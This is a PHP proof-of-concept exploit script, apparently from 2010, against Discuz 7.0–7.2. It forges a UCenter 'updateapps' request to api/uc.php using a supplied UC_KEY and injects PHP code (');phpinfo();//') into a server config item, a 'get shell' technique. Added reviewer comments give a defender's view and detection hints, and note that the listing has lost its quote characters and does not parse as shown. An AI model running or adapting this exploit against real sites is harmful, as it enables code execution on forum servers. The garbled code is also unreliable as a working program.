by:xhm1n9
#!/usr/bin/php
<?php
// Proof-of-concept script against Discuz 7.0-7.2 that abuses the UCenter "updateapps"
// call of api/uc.php. Usage per the banner below: <script> <host> <uc_key>.
// NOTE(review): this listing has lost its quote characters (e.g. `$resp = ;`,
// `ini_set(max_execution_time, 0)`, `array(time=>$k,...)`), so it does not parse
// as-is; the comments describe the evident intent of the surrounding code.
//
// Defender's view: the request assembled here is authenticated only by the UC_KEY
// passed as argv[2] (see encode_arr()/_authcode()). The controls are therefore the
// secrecy of UC_KEY (rotate it if it may have leaked), a patched api/uc.php, and
// restricting who can reach api/uc.php on the network. For detection, look for POSTs
// to api/uc.php whose `code` parameter decodes to action=updateapps and whose XML body
// carries PHP syntax in an <item id="UC_API"> element (here `);phpinfo();//`).
print_r(
+-------------------------------------------------------------------------------------------+
2010.2.6
discuz 7.0-7.2 get shell
exploit by xhming
site: http://hi.baidu.com/mr_xhming
+-------------------------------------------------------------------------------------------+
);
// Both positional arguments (host, key) are required; otherwise print usage and stop.
if ($argc < 3) {
print_r(
+-------------------------------------------------------------------------------------------+
error:php xxxx.com uc_ke
+-------------------------------------------------------------------------------------------+
);
exit;
}
// 7 == E_ERROR | E_WARNING | E_PARSE, so notices are suppressed. The ini_set() lifts the
// execution time limit (the option name was presumably quoted before this listing was garbled).
error_reporting(7);
ini_set(max_execution_time, 0);
$host = $argv[1];
$uc_key = $argv[2];
// Build the signed "updateapps" request: a timestamp plus the action name, encoded with
// the supplied key. The resulting $code is placed in the POST query string by send().
$k=time();
$get=array(time=>$k,action=>updateapps);
$code=encode_arr($get,$uc_key);
// XML body sent to api/uc.php. The UC_API item value is shaped to break out of a PHP
// expression (`)`) and call phpinfo(), which implies the server writes this item into a
// PHP file -- the server side is not shown here. Everything inside the heredoc, including
// the trailing "//插入的内容", is string content and is sent as part of the body.
$cmd = <<<xhming
<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">);phpinfo();//</item> //插入的内容
<item id="bb">ffaaa</item>
</root>
xhming;
// send() and its helpers are declared further down; PHP hoists unconditional
// top-level function declarations, so the call resolves.
send($cmd);
/**
 * POST the XML body $cmd to api/uc.php on $host and return the raw HTTP response.
 *
 * Reads $host and $code from global scope (both set by the top-level script).
 * The request path "/dz7.2/api/uc.php" is hard-coded; the original comment says to
 * adjust it. Header lines are separated by literal newlines embedded in the string
 * literals, so the line terminator is whatever the file's line endings are rather
 * than an explicit "\r\n".
 *
 * Caveats visible here: fsockopen() can return false (unreachable host) and that
 * result is not checked before fputs(); no connect/read timeout is set, so the read
 * loop runs until the server closes the connection. `$resp = ;` is presumably
 * `$resp = '';` with the quotes lost from this listing.
 *
 * @param string $cmd XML request body
 * @return string raw response (status line, headers and body)
 */
function send($cmd)
{
global $host, $code;
$message = "POST "."/dz7.2/api/uc.php?code=$code HTTP/1.1
"; // path: adjust as needed
$message .= "Content-Type: text/xml
";
// Hard-coded User-Agent. Whether legitimate UCenter sync traffic uses the same
// string is not shown here -- verify before using it as a detection signal on its own.
$message .= "User-Agent: Apache XML RPC 3.0 (Jakarta Commons httpclient Transport)
";
$message .= "Host: $host
";
$message .= "Content-Length: ".strlen($cmd)."
";
$message .= $cmd;
// Plain TCP to port 80; the return value is not checked before writing.
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = ;
// Read until EOF; `$fp &&` guards against a failed connect only after the fputs() above.
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
/**
 * Serialise $get as a "&key=value" query-style string and encode it with $uc_key.
 *
 * Each pair is appended as "&" . $key . "=" . $val (the quote characters are missing
 * from this listing, hence `&.$key.=.$val`). The string is then passed to _authcode()
 * in ENCODE mode, so the resulting token is opaque to anyone without the key.
 * Values are not URL-encoded; the caller only passes an integer timestamp and a
 * plain ASCII action name.
 *
 * @param array  $get    key => value pairs to encode
 * @param string $uc_key shared secret used by _authcode()
 * @return string encoded token for the `code` query parameter
 */
function encode_arr($get,$uc_key) {
$tmp = ;
foreach($get as $key => $val) {
$tmp .= &.$key.=.$val;
}
return _authcode($tmp, ENCODE, $uc_key);
}
/**
 * UCenter-style authcode: authenticated encoding/decoding of $string under $key using
 * an RC4 keystream (key scheduling and keystream loops below match RC4).
 *
 * ENCODE plaintext layout before encryption: 10-digit expiry timestamp (0 = none),
 * 16 hex chars of md5(plaintext . $keyb) acting as a MAC, then the plaintext.
 * ENCODE output: 4-char $keyc prefix followed by base64 with '=' padding stripped.
 * DECODE returns the recovered plaintext, or an empty string when the expiry has
 * passed or the MAC does not match.
 *
 * Notes for a reviewer: the string literals 'ENCODE', 'DECODE' and '' have lost
 * their quotes in this listing. $keyc is taken from md5(microtime()) and is a
 * per-message salt, not a secret, and not a CSPRNG value. The MAC check uses a
 * loose `==` string comparison; a timing-safe, strict comparison (hash_equals())
 * is what a defender would expect in code of this kind.
 *
 * @param string $string    plaintext (ENCODE) or token produced by ENCODE (DECODE)
 * @param string $operation 'ENCODE' or 'DECODE'
 * @param string $key       secret; an empty key falls back to the UC_KEY constant,
 *                          which this script never defines (always passes argv[2])
 * @param int    $expiry    validity in seconds for ENCODE; 0 means no expiry
 * @return string token (ENCODE) or plaintext / '' (DECODE)
 */
function _authcode($string, $operation = DECODE, $key = , $expiry = 0) {
$ckey_length = 4;
// Key derivation: keya/keyb are md5 of the two halves of md5($key);
// keyc is the 4-char per-message salt (read from the token on DECODE).
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == DECODE ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ;
// Per-message RC4 key: keya concatenated with md5(keya . keyc).
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
// DECODE: strip the salt and base64-decode. ENCODE: prepend expiry + MAC to the plaintext.
$string = $operation == DECODE ? base64_decode(substr($string, $ckey_length)) : sprintf(%010d, $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = ;
$box = range(0, 255);
$rndkey = array();
// Expand the key to 256 bytes by repeating it.
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
// RC4 key-scheduling: permute $box using the expanded key.
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
// RC4 keystream generation, XORed byte-by-byte with the input.
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == DECODE) {
// Accept only if the expiry field is 0 or still in the future, and the
// 16-char MAC matches md5(plaintext . $keyb). Loose `==` comparison here.
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return ;
}
} else {
// Salt prefix lets DECODE rebuild the same per-message key; '=' padding is dropped.
return $keyc.str_replace(=, , base64_encode($result));
}
}
?>